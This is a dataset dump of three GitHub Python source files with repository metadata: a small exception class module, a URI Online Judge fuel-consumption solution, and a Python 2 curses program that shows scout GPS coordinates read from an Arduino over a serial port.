] | permissive | akiyoko/bpmappers | e8277bdd4d6091ea5bed7e6385ee29baf92b9108 | 02a99adb1c4be6787bea015eeeb5842df540e627 | refs/heads/master | 2020-03-29T15:22:21.069252 | 2018-09-24T05:50:40 | 2018-09-24T06:16:12 | 150,059,972 | 0 | 0 | MIT | 2018-09-24T05:48:01 | 2018-09-24T05:48:01 | null | UTF-8 | Python | false | false | 204 | py | class DataError(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return repr(self.message)
class InvalidDelegateException(DataError):
pass
| [
"shinya.okano@beproud.jp"
] | shinya.okano@beproud.jp |
f78b8273234e854f8a98033346c056b40540b905 | 8b31087237d86dce4c4105a049b210ffb499a7db | /1014-Consumption.py | c32c0070c3a4eed4a78214c5272a0f51218dfa89 | [
"MIT"
] | permissive | OrianaCadavid/uri-oj | ef538ea080da8b0c713bc20538ce08a9a22916f4 | 256c811007712e85f636ae5b9357a59cf608daa8 | refs/heads/master | 2020-05-21T06:25:29.025347 | 2017-08-02T20:19:08 | 2017-08-02T20:19:08 | 84,588,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | def main():
distance = int(raw_input())
spent_fuel = float(raw_input())
consumption = distance / spent_fuel
print '{:.3f} km/l'.format(consumption)
if __name__ == '__main__':
main()
| [
"ocadavid@utp.edu.co"
] | ocadavid@utp.edu.co |
61d1d1e66cbe61f5828d915f7ac13f0707e35082 | 76340f68f9734734d24a044299316a826c2b98dc | /v2_Tech_Review/terminal-app-from-arduino.py | 24aae4492775d2772084048465fce82c6b4b836c | [
"MIT"
] | permissive | laurengulland/009yellow-beacon | 44d6f96b0d6b03805a7664d35578acd4c98ec079 | 2f9237163d8a104c9ec6e854a0bc2cbbd0e42de3 | refs/heads/master | 2021-08-28T08:34:15.731568 | 2017-12-11T18:43:08 | 2017-12-11T18:43:08 | 106,962,423 | 0 | 1 | null | 2017-12-06T02:59:11 | 2017-10-14T20:58:56 | HTML | UTF-8 | Python | false | false | 6,368 | py | import curses
import serial
import time
import signal
class TimeoutException(Exception): # Custom exception class
    """Raised by timeout_handler when SIGALRM fires, i.e. the serial read exceeded its deadline."""
    pass
def timeout_handler(signum, frame): # Custom signal handler
    """SIGALRM handler: abort the blocking serial readline() by raising TimeoutException."""
    raise TimeoutException
signal.signal(signal.SIGALRM, timeout_handler)
class ArduinoDisplay(object):
    """Curses dashboard (Python 2) that reads scout GPS packets from an
    Arduino over serial and shows the latest fix for each of two scouts.

    Packet shape (see sample_data): 'G<scout#>L<lat>N<lon>W...' -- the
    parsing in process_incoming_data() keys off the literal G/L/N/W chars.
    """
    def __init__(self,baudrate=9600):
        """Set up state, the curses screen, and the serial port.

        baudrate: serial speed for /dev/ttyACM0 (default 9600).
        """
        self.test_without_screen=False #set to true for debugging curses
        self.test_without_arduino=False #set to true for debugging serial
        self.sample_data = 'G2L42.360344N71.094887W12:6.0'
        self.arduino=None
        self.incoming_scout=1
        self.was_data_received=False
        self.last_time_data_received=[time.localtime(),time.localtime()]
        self.scout_data=[['',''],['','']] #2D array - currently set up for two scouts
        self.processed_scout_data=[[(0,0,''),(0,0,''),(0,0,'')],[(0,0,''),(0,0,''),(0,0,'')]]
        if not self.test_without_screen:
            self.scr = curses.initscr()
            curses.halfdelay(5) # How many tenths of a second are waited, from 1 to 255
            curses.noecho() # Wont print the input
        if not self.test_without_arduino:
            self.arduino=serial.Serial('/dev/ttyACM0',baudrate)
    def place_data(self):
        """Turn the current scout's raw data into (row, col, text) triples
        for draw_screen(), choosing the message by connection/GPS state."""
        # print 'scout '+str(self.incoming_scout)+' data', self.scout_data[self.incoming_scout-1]
        str_time = time.strftime("%H:%M:%S", self.last_time_data_received[self.incoming_scout-1])
        row = int(self.incoming_scout*3.5)  # scout 1 -> row 3, scout 2 -> row 7
        print 'scout data:',self.scout_data
        if self.was_data_received:
            # Good fix: show latitude, longitude, and the time it arrived.
            self.processed_scout_data[self.incoming_scout-1][0]= (row, 5, self.scout_data[self.incoming_scout-1][0])
            self.processed_scout_data[self.incoming_scout-1][1]= (row, 25, self.scout_data[self.incoming_scout-1][1])
            self.processed_scout_data[self.incoming_scout-1][2]= (row, 45, str(str_time))
        elif 'null' in self.scout_data[self.incoming_scout-1][0]:
            # Radio link up but the scout has no GPS fix.
            self.processed_scout_data[self.incoming_scout-1][0]= (row, 5, 'NO GPS SIGNAL')
            self.processed_scout_data[self.incoming_scout-1][1]= (row, 25, 'NO GPS SIGNAL')
            self.processed_scout_data[self.incoming_scout-1][2]= (row, 45, str(str_time))
        elif 'NO' in self.scout_data[self.incoming_scout-1]:
            # Serial read timed out: no connection; mark both display rows.
            self.processed_scout_data[self.incoming_scout-1][0] = (3, 5, 'NO CONNECTION')
            self.processed_scout_data[self.incoming_scout-1][1] = (7, 5, 'NO CONNECTION')
        else:
            pass
        print 'processed_scout_data: ',self.processed_scout_data
    def draw_screen(self):
        """Redraw the whole curses screen from processed_scout_data."""
        self.scr.clear()
        self.scr.addstr(1,2,'SCOUT 1 ------------------------------------------------------')
        self.scr.addstr(5,2,'SCOUT 2 ------------------------------------------------------')
        self.scr.addstr(10,0,'Current Time: '+time.strftime("%H:%M:%S",time.localtime()))
        # print(self.processed_scout_data)
        for scout_data in self.processed_scout_data:
            for dat in scout_data:
                self.scr.addstr(dat[0],dat[1],dat[2])
        self.scr.refresh()
    def process_incoming_data(self,transmitted=None):
        """Parse one serial line and update scout_data / was_data_received.

        Branches: a well-formed 29-char packet stores lat/lon; a packet
        containing 'null' marks GPS lost for that scout; 'NO CONNECTION'
        is the timeout marker injected by run(); anything else is ignored.
        """
        if 'null' not in transmitted and len(transmitted)==29:
            self.was_data_received=True
            # print 'TRANSMITTING:',transmitted
            self.incoming_scout = int(transmitted[transmitted.index('G')+1:transmitted.index('G')+2])
            # Latitude is the text between 'L' and 'N'; longitude between 'N' and 'W'.
            location_n = transmitted[transmitted.index('L')+1:transmitted.index('N')]+' '+transmitted[transmitted.index('N')]
            location_w = transmitted[transmitted.index('N')+1:transmitted.index('W')]+' '+transmitted[transmitted.index('W')]
            self.last_time_data_received[self.incoming_scout-1] = time.localtime()
            self.scout_data[self.incoming_scout-1] = [location_n,location_w]
        elif 'null' in transmitted:
            self.was_data_received=False
            #maybe have it display warning that received bad data?
            # print 'transmitted: ',transmitted
            # self.incoming_scout=int(transmitted[transmitted.index('S')+1:transmitted.index('S')+2])
            # print self.incoming_scout
            # print ['GPS'+str(self.incoming_scout)+'null', 'GPS'+str(self.incoming_scout)+'null']
            try: #this is cheap but I don't care right now
                self.incoming_scout=int(transmitted[transmitted.index('S')+1:transmitted.index('S')+2])
                self.scout_data[self.incoming_scout-1]=['GPS'+str(self.incoming_scout)+'null', 'GPS'+str(self.incoming_scout)+'null']
            except:
                # Could not even tell which scout the packet came from.
                print 'EXCEPTED'
                self.scout_data[0] = ['FAULTY DATA', 'FAULTY DATA']
                self.scout_data[1] = ['FAULTY DATA', 'FAULTY DATA']
                print('NO GPS TRANSMITTED')
        elif 'NO CONNECTION' in transmitted:
            print('PROCESSING WITHOUT CONNECTION')
            self.was_data_received=False
            self.scout_data[0] = ['NO CONNECTION', 'NO CONNECTION']
            self.scout_data[1] = ['NO CONNECTION', 'NO CONNECTION']
        else:
            self.was_data_received=False
            print('NOPE')
    def run(self):
        """Main loop: read a line (1 s SIGALRM timeout), parse it, redraw."""
        if not self.test_without_screen:
            self.draw_screen()
        while True:
            # if not self.test_without_screen:
            #     char = self.scr.getch() # This blocks (waits) until the time has elapsed, or there is input to be handled
            if self.test_without_arduino:
                transmitted=self.sample_data
            else:
                # The alarm aborts a stalled readline() via TimeoutException.
                signal.alarm(1)
                try:
                    transmitted = self.arduino.readline()[:-2]
                except TimeoutException:
                    # NOTE(review): (x+1)%2+1 maps 1->1 and 2->2, so this does
                    # NOT actually alternate the scout on timeout -- confirm intent.
                    self.incoming_scout= (self.incoming_scout+1)%2+1
                    transmitted='NO CONNECTION'
                else:
                    signal.alarm(0)
            print 'RECEIVED: ',transmitted
            self.process_incoming_data(transmitted)
            print 'scout '+str(self.incoming_scout)+' data', self.scout_data[self.incoming_scout-1]
            self.place_data()
            if not self.test_without_screen:
                self.draw_screen()
                self.scr.addstr(10,0,'Current Time: '+time.strftime("%H:%M:%S",time.localtime()))
if __name__ == '__main__':
display = ArduinoDisplay(9600)
display.run()
| [
"lauren.gulland@students.olin.edu"
] | lauren.gulland@students.olin.edu |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.